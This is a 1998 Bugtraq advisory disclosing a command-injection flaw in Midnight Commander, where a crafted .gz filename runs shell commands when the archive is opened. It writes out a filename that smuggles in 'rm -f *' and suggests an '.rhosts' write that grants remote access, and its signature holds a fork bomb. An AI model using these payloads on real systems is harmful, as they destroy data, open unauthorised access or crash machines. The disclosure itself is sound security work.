[6000] in bugtraq
MC shell scripts
daemon@ATHENA.MIT.EDU (=?UNKNOWN-8BIT?Q?Micha=B3?= Zalews)
Mon Jan 19 10:35:40 1998
Date: Sat, 17 Jan 1998 22:14:45 +0100
Reply-To: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@POLBOX.COM>
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
I discovered a problem with Midnight Commander's method of decompressing
archives, which allows execution of hidden commands. Evil file may be
prepared this way:
$ gzip foo
$ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz"
Now, this filename, when displayed by user-friendly programs (www or
ftp browsers, file managers), will be cropped to fit in a window :)
Under my mc (vidmode 11) it's displayed as:
quake2-test-unknown-linu~-i386-generic-beta.gz (or .tgz, your choice :)
When I'm viewing or editing .gz archive (F3/F4/ENTER) - Midnight Commander
calls gzip from a shell script created in /tmp:
gzip -dc 'filename' 2>/dev/null
That may be dangerous. In above case, this script is equal to:
gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null
rm -f *
'rm -f *' may be replaced with 'echo + +>.rhosts',
'touch WHOS_THE_WINNER' etc ;)
Of course, it isn't serious problem for experienced users, but
what's with the non-experienced ones (80%) ;-)
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
